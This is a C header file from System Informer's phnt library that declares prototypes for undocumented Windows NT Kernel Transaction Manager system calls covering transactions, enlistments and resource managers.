/phnt/include/nttmapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Transaction Manager support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTTMAPI_H 8 | #define _NTTMAPI_H 9 | 10 | #if (PHNT_VERSION >= PHNT_VISTA) 11 | NTSYSCALLAPI 12 | NTSTATUS 13 | NTAPI 14 | NtCreateTransactionManager( 15 | _Out_ PHANDLE TmHandle, 16 | _In_ ACCESS_MASK DesiredAccess, 17 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 18 | _In_opt_ PUNICODE_STRING LogFileName, 19 | _In_opt_ ULONG CreateOptions, 20 | _In_opt_ ULONG CommitStrength 21 | ); 22 | #endif 23 | 24 | #if (PHNT_VERSION >= PHNT_VISTA) 25 | NTSYSCALLAPI 26 | NTSTATUS 27 | NTAPI 28 | NtOpenTransactionManager( 29 | _Out_ PHANDLE TmHandle, 30 | _In_ ACCESS_MASK DesiredAccess, 31 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 32 | _In_opt_ PUNICODE_STRING LogFileName, 33 | _In_opt_ LPGUID TmIdentity, 34 | _In_opt_ ULONG OpenOptions 35 | ); 36 | #endif 37 | 38 | #if (PHNT_VERSION >= PHNT_VISTA) 39 | NTSYSCALLAPI 40 | NTSTATUS 41 | NTAPI 42 | NtRenameTransactionManager( 43 | _In_ PUNICODE_STRING LogFileName, 44 | _In_ LPGUID ExistingTransactionManagerGuid 45 | ); 46 | #endif 47 | 48 | #if (PHNT_VERSION >= PHNT_VISTA) 49 | NTSYSCALLAPI 50 | NTSTATUS 51 | NTAPI 52 | NtRollforwardTransactionManager( 53 | _In_ HANDLE TransactionManagerHandle, 54 | _In_opt_ PLARGE_INTEGER TmVirtualClock 55 | ); 56 | #endif 57 | 58 | #if (PHNT_VERSION >= PHNT_VISTA) 59 | NTSYSCALLAPI 60 | NTSTATUS 61 | NTAPI 62 | NtRecoverTransactionManager( 63 | _In_ HANDLE TransactionManagerHandle 64 | ); 65 | #endif 66 | 67 | #if (PHNT_VERSION >= PHNT_VISTA) 68 | NTSYSCALLAPI 69 | NTSTATUS 70 | NTAPI 71 | NtQueryInformationTransactionManager( 72 | _In_ HANDLE TransactionManagerHandle, 73 | _In_ TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass, 74 | _Out_writes_bytes_(TransactionManagerInformationLength) PVOID TransactionManagerInformation, 75 | _In_ ULONG TransactionManagerInformationLength, 76 | _Out_opt_ PULONG ReturnLength 77 | ); 78 | #endif 79 | 80 | #if (PHNT_VERSION >= PHNT_VISTA) 81 | NTSYSCALLAPI 82 | NTSTATUS 83 | NTAPI 84 | NtSetInformationTransactionManager( 85 | _In_opt_ HANDLE TmHandle, 86 | _In_ TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass, 87 | _In_reads_bytes_(TransactionManagerInformationLength) PVOID TransactionManagerInformation, 88 | _In_ ULONG TransactionManagerInformationLength 89 | ); 90 | #endif 91 | 92 | #if (PHNT_VERSION >= PHNT_VISTA) 93 | NTSYSCALLAPI 94 | NTSTATUS 95 | NTAPI 96 | NtEnumerateTransactionObject( 97 | _In_opt_ HANDLE RootObjectHandle, 98 | _In_ KTMOBJECT_TYPE QueryType, 99 | _Inout_updates_bytes_(ObjectCursorLength) PKTMOBJECT_CURSOR ObjectCursor, 100 | _In_ ULONG ObjectCursorLength, 101 | _Out_ PULONG ReturnLength 102 | ); 103 | #endif 104 | 105 | #if (PHNT_VERSION >= PHNT_VISTA) 106 | NTSYSCALLAPI 107 | NTSTATUS 108 | NTAPI 109 | NtCreateTransaction( 110 | _Out_ PHANDLE TransactionHandle, 111 | _In_ ACCESS_MASK DesiredAccess, 112 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 113 | _In_opt_ LPGUID Uow, 114 | _In_opt_ HANDLE TmHandle, 115 | _In_opt_ ULONG CreateOptions, 116 | _In_opt_ ULONG IsolationLevel, 117 | _In_opt_ ULONG IsolationFlags, 118 | _In_opt_ PLARGE_INTEGER Timeout, 119 | _In_opt_ PUNICODE_STRING Description 120 | ); 121 | #endif 122 | 123 | #if (PHNT_VERSION >= PHNT_VISTA) 124 | NTSYSCALLAPI 125 | NTSTATUS 126 | NTAPI 127 | NtOpenTransaction( 128 | _Out_ PHANDLE TransactionHandle, 129 | _In_ ACCESS_MASK DesiredAccess, 130 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 131 | _In_opt_ LPGUID Uow, 132 | _In_opt_ HANDLE TmHandle 133 | ); 134 | #endif 135 | 136 | #if (PHNT_VERSION >= PHNT_VISTA) 137 | NTSYSCALLAPI 138 | NTSTATUS 139 | NTAPI 140 | NtQueryInformationTransaction( 141 | _In_ HANDLE TransactionHandle, 142 | _In_ TRANSACTION_INFORMATION_CLASS TransactionInformationClass, 143 | _Out_writes_bytes_(TransactionInformationLength) PVOID TransactionInformation, 144 | _In_ ULONG TransactionInformationLength, 145 | _Out_opt_ PULONG ReturnLength 146 | ); 147 | #endif 148 | 149 | #if (PHNT_VERSION >= PHNT_VISTA) 150 | NTSYSCALLAPI 151 | NTSTATUS 152 | NTAPI 153 | NtSetInformationTransaction( 154 | _In_ HANDLE TransactionHandle, 155 | _In_ TRANSACTION_INFORMATION_CLASS TransactionInformationClass, 156 | _In_reads_bytes_(TransactionInformationLength) PVOID TransactionInformation, 157 | _In_ ULONG TransactionInformationLength 158 | ); 159 | #endif 160 | 161 | #if (PHNT_VERSION >= PHNT_VISTA) 162 | NTSYSCALLAPI 163 | NTSTATUS 164 | NTAPI 165 | NtCommitTransaction( 166 | _In_ HANDLE TransactionHandle, 167 | _In_ BOOLEAN Wait 168 | ); 169 | #endif 170 | 171 | #if (PHNT_VERSION >= PHNT_VISTA) 172 | NTSYSCALLAPI 173 | NTSTATUS 174 | NTAPI 175 | NtRollbackTransaction( 176 | _In_ HANDLE TransactionHandle, 177 | _In_ BOOLEAN Wait 178 | ); 179 | #endif 180 | 181 | #if (PHNT_VERSION >= PHNT_VISTA) 182 | NTSYSCALLAPI 183 | NTSTATUS 184 | NTAPI 185 | NtCreateEnlistment( 186 | _Out_ PHANDLE EnlistmentHandle, 187 | _In_ ACCESS_MASK DesiredAccess, 188 | _In_ HANDLE ResourceManagerHandle, 189 | _In_ HANDLE TransactionHandle, 190 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 191 | _In_opt_ ULONG CreateOptions, 192 | _In_ NOTIFICATION_MASK NotificationMask, 193 | _In_opt_ PVOID EnlistmentKey 194 | ); 195 | #endif 196 | 197 | #if (PHNT_VERSION >= PHNT_VISTA) 198 | NTSYSCALLAPI 199 | NTSTATUS 200 | NTAPI 201 | NtOpenEnlistment( 202 | _Out_ PHANDLE EnlistmentHandle, 203 | _In_ ACCESS_MASK DesiredAccess, 204 | _In_ HANDLE ResourceManagerHandle, 205 | _In_ LPGUID EnlistmentGuid, 206 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes 207 | ); 208 | #endif 209 | 210 | #if (PHNT_VERSION >= PHNT_VISTA) 211 | NTSYSCALLAPI 212 | NTSTATUS 213 | NTAPI 214 | NtQueryInformationEnlistment( 215 | _In_ HANDLE EnlistmentHandle, 216 | _In_ ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass, 217 | _Out_writes_bytes_(EnlistmentInformationLength) PVOID EnlistmentInformation, 218 | _In_ ULONG EnlistmentInformationLength, 219 | _Out_opt_ PULONG ReturnLength 220 | ); 221 | #endif 222 | 223 | #if (PHNT_VERSION >= PHNT_VISTA) 224 | NTSYSCALLAPI 225 | NTSTATUS 226 | NTAPI 227 | NtSetInformationEnlistment( 228 | _In_opt_ HANDLE EnlistmentHandle, 229 | _In_ ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass, 230 | _In_reads_bytes_(EnlistmentInformationLength) PVOID EnlistmentInformation, 231 | _In_ ULONG EnlistmentInformationLength 232 | ); 233 | #endif 234 | 235 | #if (PHNT_VERSION >= PHNT_VISTA) 236 | NTSYSCALLAPI 237 | NTSTATUS 238 | NTAPI 239 | NtRecoverEnlistment( 240 | _In_ HANDLE EnlistmentHandle, 241 | _In_opt_ PVOID EnlistmentKey 242 | ); 243 | #endif 244 | 245 | #if (PHNT_VERSION >= PHNT_VISTA) 246 | NTSYSCALLAPI 247 | NTSTATUS 248 | NTAPI 249 | NtPrePrepareEnlistment( 250 | _In_ HANDLE EnlistmentHandle, 251 | _In_opt_ PLARGE_INTEGER TmVirtualClock 252 | ); 253 | #endif 254 | 255 | #if (PHNT_VERSION >= PHNT_VISTA) 256 | NTSYSCALLAPI 257 | NTSTATUS 258 | NTAPI 259 | NtPrepareEnlistment( 260 | _In_ HANDLE EnlistmentHandle, 261 | _In_opt_ PLARGE_INTEGER TmVirtualClock 262 | ); 263 | #endif 264 | 265 | #if (PHNT_VERSION >= PHNT_VISTA) 266 | NTSYSCALLAPI 267 | NTSTATUS 268 | NTAPI 269 | NtCommitEnlistment( 270 | _In_ HANDLE EnlistmentHandle, 271 | _In_opt_ PLARGE_INTEGER TmVirtualClock 272 | ); 273 | #endif 274 | 275 | #if (PHNT_VERSION >= PHNT_VISTA) 276 | NTSYSCALLAPI 277 | NTSTATUS 278 | NTAPI 279 | NtRollbackEnlistment( 280 | _In_ HANDLE EnlistmentHandle, 281 | _In_opt_ PLARGE_INTEGER TmVirtualClock 282 | ); 283 | #endif 284 | 285 | #if (PHNT_VERSION >= PHNT_VISTA) 286 | NTSYSCALLAPI 287 | NTSTATUS 288 | NTAPI 289 | NtPrePrepareComplete( 290 | _In_ HANDLE EnlistmentHandle, 291 | _In_opt_ PLARGE_INTEGER TmVirtualClock 292 | ); 293 | #endif 294 | 295 | #if (PHNT_VERSION >= PHNT_VISTA) 296 | NTSYSCALLAPI 297 | NTSTATUS 298 | NTAPI 299 | NtPrepareComplete( 300 | _In_ HANDLE EnlistmentHandle, 301 | _In_opt_ PLARGE_INTEGER TmVirtualClock 302 | ); 303 | #endif 304 | 305 | #if (PHNT_VERSION >= PHNT_VISTA) 306 | NTSYSCALLAPI 307 | NTSTATUS 308 | NTAPI 309 | NtCommitComplete( 310 | _In_ HANDLE EnlistmentHandle, 311 | _In_opt_ PLARGE_INTEGER TmVirtualClock 312 | ); 313 | #endif 314 | 315 | #if (PHNT_VERSION >= PHNT_VISTA) 316 | NTSYSCALLAPI 317 | NTSTATUS 318 | NTAPI 319 | NtReadOnlyEnlistment( 320 | _In_ HANDLE EnlistmentHandle, 321 | _In_opt_ PLARGE_INTEGER TmVirtualClock 322 | ); 323 | #endif 324 | 325 | #if (PHNT_VERSION >= PHNT_VISTA) 326 | NTSYSCALLAPI 327 | NTSTATUS 328 | NTAPI 329 | NtRollbackComplete( 330 | _In_ HANDLE EnlistmentHandle, 331 | _In_opt_ PLARGE_INTEGER TmVirtualClock 332 | ); 333 | #endif 334 | 335 | #if (PHNT_VERSION >= PHNT_VISTA) 336 | NTSYSCALLAPI 337 | NTSTATUS 338 | NTAPI 339 | NtSinglePhaseReject( 340 | _In_ HANDLE EnlistmentHandle, 341 | _In_opt_ PLARGE_INTEGER TmVirtualClock 342 | ); 343 | #endif 344 | 345 | #if (PHNT_VERSION >= PHNT_VISTA) 346 | NTSYSCALLAPI 347 | NTSTATUS 348 | NTAPI 349 | NtCreateResourceManager( 350 | _Out_ PHANDLE ResourceManagerHandle, 351 | _In_ ACCESS_MASK DesiredAccess, 352 | _In_ HANDLE TmHandle, 353 | _In_ LPGUID RmGuid, 354 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 355 | _In_opt_ ULONG CreateOptions, 356 | _In_opt_ PUNICODE_STRING Description 357 | ); 358 | #endif 359 | 360 | #if (PHNT_VERSION >= PHNT_VISTA) 361 | NTSYSCALLAPI 362 | NTSTATUS 363 | NTAPI 364 | NtOpenResourceManager( 365 | _Out_ PHANDLE ResourceManagerHandle, 366 | _In_ ACCESS_MASK DesiredAccess, 367 | _In_ HANDLE TmHandle, 368 | _In_opt_ LPGUID ResourceManagerGuid, 369 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes 370 | ); 371 | #endif 372 | 373 | #if (PHNT_VERSION >= PHNT_VISTA) 374 | NTSYSCALLAPI 375 | NTSTATUS 376 | NTAPI 377 | NtRecoverResourceManager( 378 | _In_ HANDLE ResourceManagerHandle 379 | ); 380 | #endif 381 | 382 | #if (PHNT_VERSION >= PHNT_VISTA) 383 | NTSYSCALLAPI 384 | NTSTATUS 385 | NTAPI 386 | NtGetNotificationResourceManager( 387 | _In_ HANDLE ResourceManagerHandle, 388 | _Out_ PTRANSACTION_NOTIFICATION TransactionNotification, 389 | _In_ ULONG NotificationLength, 390 | _In_opt_ PLARGE_INTEGER Timeout, 391 | _Out_opt_ PULONG ReturnLength, 392 | _In_ ULONG Asynchronous, 393 | _In_opt_ ULONG_PTR AsynchronousContext 394 | ); 395 | #endif 396 | 397 | #if (PHNT_VERSION >= PHNT_VISTA) 398 | NTSYSCALLAPI 399 | NTSTATUS 400 | NTAPI 401 | NtQueryInformationResourceManager( 402 | _In_ HANDLE ResourceManagerHandle, 403 | _In_ RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass, 404 | _Out_writes_bytes_(ResourceManagerInformationLength) PVOID ResourceManagerInformation, 405 | _In_ ULONG ResourceManagerInformationLength, 406 | _Out_opt_ PULONG ReturnLength 407 | ); 408 | #endif 409 | 410 | #if (PHNT_VERSION >= PHNT_VISTA) 411 | NTSYSCALLAPI 412 | NTSTATUS 413 | NTAPI 414 | NtSetInformationResourceManager( 415 | _In_ HANDLE ResourceManagerHandle, 416 | _In_ RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass, 417 | _In_reads_bytes_(ResourceManagerInformationLength) PVOID ResourceManagerInformation, 418 | _In_ ULONG ResourceManagerInformationLength 419 | ); 420 | #endif 421 | 422 | #if (PHNT_VERSION >= PHNT_VISTA) 423 | NTSYSCALLAPI 424 | NTSTATUS 425 | NTAPI 426 | NtRegisterProtocolAddressInformation( 427 | _In_ HANDLE ResourceManager, 428 | _In_ PCRM_PROTOCOL_ID ProtocolId, 429 | _In_ ULONG ProtocolInformationSize, 430 | _In_ PVOID ProtocolInformation, 431 | _In_opt_ ULONG CreateOptions 432 | ); 433 | #endif 434 | 435 | #if (PHNT_VERSION >= PHNT_VISTA) 436 | NTSYSCALLAPI 437 | NTSTATUS 438 | NTAPI 439 | NtPropagationComplete( 440 | _In_ HANDLE ResourceManagerHandle, 441 | _In_ ULONG RequestCookie, 442 | _In_ ULONG BufferLength, 443 | _In_ PVOID Buffer 444 | ); 445 | #endif 446 | 447 | #if (PHNT_VERSION >= PHNT_VISTA) 448 | NTSYSCALLAPI 449 | NTSTATUS 450 | NTAPI 451 | NtPropagationFailed( 452 | _In_ HANDLE ResourceManagerHandle, 453 | _In_ ULONG RequestCookie, 454 | _In_ NTSTATUS PropStatus 455 | ); 456 | #endif 457 | 458 | #if (PHNT_VERSION >= PHNT_VISTA) 459 | // private 460 | NTSYSCALLAPI 461 | NTSTATUS 462 | NTAPI 463 | NtFreezeTransactions( 464 | _In_ PLARGE_INTEGER FreezeTimeout, 465 | _In_ PLARGE_INTEGER ThawTimeout 466 | ); 467 | #endif 468 | 469 | #if (PHNT_VERSION >= PHNT_VISTA) 470 | // private 471 | NTSYSCALLAPI 472 | NTSTATUS 473 | NTAPI 474 | NtThawTransactions( 475 | VOID 476 | ); 477 | #endif 478 | 479 | #endif 480 | --------------------------------------------------------------------------------